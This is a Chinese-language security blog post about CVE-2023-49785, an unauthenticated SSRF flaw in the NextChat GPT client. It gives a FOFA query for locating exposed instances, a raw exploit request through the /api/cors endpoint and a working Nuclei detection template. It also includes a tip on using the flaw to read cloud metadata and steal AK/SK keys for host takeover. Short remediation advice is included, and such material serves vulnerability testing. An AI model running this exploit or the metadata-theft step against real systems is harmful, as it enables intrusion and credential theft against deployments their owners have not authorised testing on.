NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。
title="NextChat"
GET /api/cors/https/www.baidu.com HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
id: CVE-2023-49785
info:
name: NextChat cors SSRF漏洞 (CVE-2023-49785)
author: nobody
severity: high
description: |
NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
impact: |
攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
remediation: |
升级版本,打补丁
metadata:
verified: true
max-request: 3
fofa-query: title="NextChat"
tags: ai,gpt,nextchat,ssrf
修复建议
建议升级到最新版本或打补丁
非必要禁止公网访问或白名单访问
requests:
- raw:
- |
GET /api/cors/https/www.baidu.com HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0
Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
matchers:
- type: dsl
dsl:
- status_code == 200 && contains_all(body,"京ICP证030173
号")
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.